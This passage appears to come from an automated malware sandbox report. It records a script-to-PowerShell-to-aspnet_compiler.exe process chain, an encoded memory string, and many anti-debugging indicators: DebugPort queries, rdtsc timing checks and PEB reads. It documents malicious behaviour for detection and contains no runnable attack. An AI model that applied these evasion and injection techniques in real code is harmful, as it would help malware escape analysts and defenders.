          Source: wscript.exe, 00000000.00000003.1787171415.00000163D6950000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010FD1C0 rdtsc 5_2_010FD1C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_00417AD3 LdrLoadDll,5_2_00417AD3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01140115 mov eax, dword ptr fs:[00000030h]5_2_01140115
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0112A118 mov ecx, dword ptr fs:[00000030h]5_2_0112A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0112A118 mov eax, dword ptr fs:[00000030h]5_2_0112A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0112A118 mov eax, dword ptr fs:[00000030h]5_2_0112A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0112A118 mov eax, dword ptr fs:[00000030h]5_2_0112A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B0124 mov eax, dword ptr fs:[00000030h]5_2_010B0124
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107B136 mov eax, dword ptr fs:[00000030h]5_2_0107B136
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107B136 mov eax, dword ptr fs:[00000030h]5_2_0107B136
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107B136 mov eax, dword ptr fs:[00000030h]5_2_0107B136
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107B136 mov eax, dword ptr fs:[00000030h]5_2_0107B136
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01081131 mov eax, dword ptr fs:[00000030h]5_2_01081131
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01081131 mov eax, dword ptr fs:[00000030h]5_2_01081131
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01155152 mov eax, dword ptr fs:[00000030h]5_2_01155152
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01079148 mov eax, dword ptr fs:[00000030h]5_2_01079148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01079148 mov eax, dword ptr fs:[00000030h]5_2_01079148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01079148 mov eax, dword ptr fs:[00000030h]5_2_01079148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01079148 mov eax, dword ptr fs:[00000030h]5_2_01079148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107C156 mov eax, dword ptr fs:[00000030h]5_2_0107C156
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01114144 mov eax, dword ptr fs:[00000030h]5_2_01114144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01114144 mov eax, dword ptr fs:[00000030h]5_2_01114144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01114144 mov ecx, dword ptr fs:[00000030h]5_2_01114144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01114144 mov eax, dword ptr fs:[00000030h]5_2_01114144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01114144 mov eax, dword ptr fs:[00000030h]5_2_01114144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01087152 mov eax, dword ptr fs:[00000030h]5_2_01087152
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01086154 mov eax, dword ptr fs:[00000030h]5_2_01086154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01086154 mov eax, dword ptr fs:[00000030h]5_2_01086154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01119179 mov eax, dword ptr fs:[00000030h]5_2_01119179
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107F172 mov eax, dword ptr fs:[00000030h]5_2_0107F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107F172 mov eax, dword ptr fs:[00000030h]5_2_0107F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107F172 mov eax, dword ptr fs:[00000030h]5_2_0107F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107F172 mov eax, dword ptr fs:[00000030h]5_2_0107F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107F172 mov eax, dword ptr fs:[00000030h]5_2_0107F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107F172 mov eax, dword ptr fs:[00000030h]5_2_0107F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107F172 mov eax, dword ptr fs:[00000030h]5_2_0107F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107F172 mov eax, dword ptr fs:[00000030h]5_2_0107F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107F172 mov eax, dword ptr fs:[00000030h]5_2_0107F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107F172 mov eax, dword ptr fs:[00000030h]5_2_0107F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107F172 mov eax, dword ptr fs:[00000030h]5_2_0107F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107F172 mov eax, dword ptr fs:[00000030h]5_2_0107F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107F172 mov eax, dword ptr fs:[00000030h]5_2_0107F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107F172 mov eax, dword ptr fs:[00000030h]5_2_0107F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107F172 mov eax, dword ptr fs:[00000030h]5_2_0107F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107F172 mov eax, dword ptr fs:[00000030h]5_2_0107F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107F172 mov eax, dword ptr fs:[00000030h]5_2_0107F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107F172 mov eax, dword ptr fs:[00000030h]5_2_0107F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107F172 mov eax, dword ptr fs:[00000030h]5_2_0107F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107F172 mov eax, dword ptr fs:[00000030h]5_2_0107F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107F172 mov eax, dword ptr fs:[00000030h]5_2_0107F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010C0185 mov eax, dword ptr fs:[00000030h]5_2_010C0185
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0110019F mov eax, dword ptr fs:[00000030h]5_2_0110019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0110019F mov eax, dword ptr fs:[00000030h]5_2_0110019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0110019F mov eax, dword ptr fs:[00000030h]5_2_0110019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0110019F mov eax, dword ptr fs:[00000030h]5_2_0110019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107A197 mov eax, dword ptr fs:[00000030h]5_2_0107A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107A197 mov eax, dword ptr fs:[00000030h]5_2_0107A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107A197 mov eax, dword ptr fs:[00000030h]5_2_0107A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0113C188 mov eax, dword ptr fs:[00000030h]5_2_0113C188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0113C188 mov eax, dword ptr fs:[00000030h]5_2_0113C188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010D7190 mov eax, dword ptr fs:[00000030h]5_2_010D7190
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011311A4 mov eax, dword ptr fs:[00000030h]5_2_011311A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011311A4 mov eax, dword ptr fs:[00000030h]5_2_011311A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011311A4 mov eax, dword ptr fs:[00000030h]5_2_011311A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011311A4 mov eax, dword ptr fs:[00000030h]5_2_011311A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0109B1B0 mov eax, dword ptr fs:[00000030h]5_2_0109B1B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011461C3 mov eax, dword ptr fs:[00000030h]5_2_011461C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011461C3 mov eax, dword ptr fs:[00000030h]5_2_011461C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BD1D0 mov eax, dword ptr fs:[00000030h]5_2_010BD1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BD1D0 mov ecx, dword ptr fs:[00000030h]5_2_010BD1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011551CB mov eax, dword ptr fs:[00000030h]5_2_011551CB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A51EF mov eax, dword ptr fs:[00000030h]5_2_010A51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A51EF mov eax, dword ptr fs:[00000030h]5_2_010A51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A51EF mov eax, dword ptr fs:[00000030h]5_2_010A51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A51EF mov eax, dword ptr fs:[00000030h]5_2_010A51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A51EF mov eax, dword ptr fs:[00000030h]5_2_010A51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A51EF mov eax, dword ptr fs:[00000030h]5_2_010A51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A51EF mov eax, dword ptr fs:[00000030h]5_2_010A51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A51EF mov eax, dword ptr fs:[00000030h]5_2_010A51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A51EF mov eax, dword ptr fs:[00000030h]5_2_010A51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A51EF mov eax, dword ptr fs:[00000030h]5_2_010A51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A51EF mov eax, dword ptr fs:[00000030h]5_2_010A51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A51EF mov eax, dword ptr fs:[00000030h]5_2_010A51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A51EF mov eax, dword ptr fs:[00000030h]5_2_010A51EF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010851ED mov eax, dword ptr fs:[00000030h]5_2_010851ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011561E5 mov eax, dword ptr fs:[00000030h]5_2_011561E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B01F8 mov eax, dword ptr fs:[00000030h]5_2_010B01F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0109E016 mov eax, dword ptr fs:[00000030h]5_2_0109E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0109E016 mov eax, dword ptr fs:[00000030h]5_2_0109E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0109E016 mov eax, dword ptr fs:[00000030h]5_2_0109E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0109E016 mov eax, dword ptr fs:[00000030h]5_2_0109E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107A020 mov eax, dword ptr fs:[00000030h]5_2_0107A020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107C020 mov eax, dword ptr fs:[00000030h]5_2_0107C020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0114903E mov eax, dword ptr fs:[00000030h]5_2_0114903E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0114903E mov eax, dword ptr fs:[00000030h]5_2_0114903E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0114903E mov eax, dword ptr fs:[00000030h]5_2_0114903E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0114903E mov eax, dword ptr fs:[00000030h]5_2_0114903E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0112705E mov ebx, dword ptr fs:[00000030h]5_2_0112705E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0112705E mov eax, dword ptr fs:[00000030h]5_2_0112705E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01082050 mov eax, dword ptr fs:[00000030h]5_2_01082050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AB052 mov eax, dword ptr fs:[00000030h]5_2_010AB052
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01155060 mov eax, dword ptr fs:[00000030h]5_2_01155060
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01091070 mov eax, dword ptr fs:[00000030h]5_2_01091070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01091070 mov ecx, dword ptr fs:[00000030h]5_2_01091070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01091070 mov eax, dword ptr fs:[00000030h]5_2_01091070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01091070 mov eax, dword ptr fs:[00000030h]5_2_01091070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01091070 mov eax, dword ptr fs:[00000030h]5_2_01091070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01091070 mov eax, dword ptr fs:[00000030h]5_2_01091070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01091070 mov eax, dword ptr fs:[00000030h]5_2_01091070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01091070 mov eax, dword ptr fs:[00000030h]5_2_01091070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01091070 mov eax, dword ptr fs:[00000030h]5_2_01091070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01091070 mov eax, dword ptr fs:[00000030h]5_2_01091070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01091070 mov eax, dword ptr fs:[00000030h]5_2_01091070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01091070 mov eax, dword ptr fs:[00000030h]5_2_01091070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01091070 mov eax, dword ptr fs:[00000030h]5_2_01091070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AC073 mov eax, dword ptr fs:[00000030h]5_2_010AC073
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010FD070 mov ecx, dword ptr fs:[00000030h]5_2_010FD070
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108208A mov eax, dword ptr fs:[00000030h]5_2_0108208A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0107D08D mov eax, dword ptr fs:[00000030h]5_2_0107D08D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B909C mov eax, dword ptr fs:[00000030h]5_2_010B909C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AD090 mov eax, dword ptr fs:[00000030h]5_2_010AD090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AD090 mov eax, dword ptr fs:[00000030h]5_2_010AD090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01085096 mov eax, dword ptr fs:[00000030h]5_2_01085096
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011460B8 mov eax, dword ptr fs:[00000030h]5_2_011460B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011460B8 mov ecx, dword ptr fs:[00000030h]5_2_011460B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010970C0 mov eax, dword ptr fs:[00000030h]5_2_010970C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010970C0 mov ecx, dword ptr fs:[00000030h]5_2_010970C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010970C0 mov ecx, dword ptr fs:[00000030h]5_2_010970C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010970C0 mov eax, dword ptr fs:[00000030h]5_2_010970C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010970C0 mov ecx, dword ptr fs:[00000030h]5_2_010970C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010970C0 mov ecx, dword ptr fs:[00000030h]5_2_010970C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010970C0 mov eax, dword ptr fs:[00000030h]5_2_010970C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010970C0 mov eax, dword ptr fs:[00000030h]5_2_010970C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010970C0 mov eax, dword ptr fs:[00000030h]5_2_010970C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010970C0 mov eax, dword ptr fs:[00000030h]5_2_010970C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010970C0 mov eax, dword ptr fs:[00000030h]5_2_010970C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010970C0 mov eax, dword ptr fs:[00000030h]5_2_010970C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010970C0 mov eax, dword ptr fs:[00000030h]5_2_010970C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010970C0 mov eax, dword ptr fs:[00000030h]5_2_010970C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010970C0 mov eax, dword ptr fs:[00000030h]5_2_010970C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010970C0 mov eax, dword ptr fs:[00000030h]5_2_010970C0
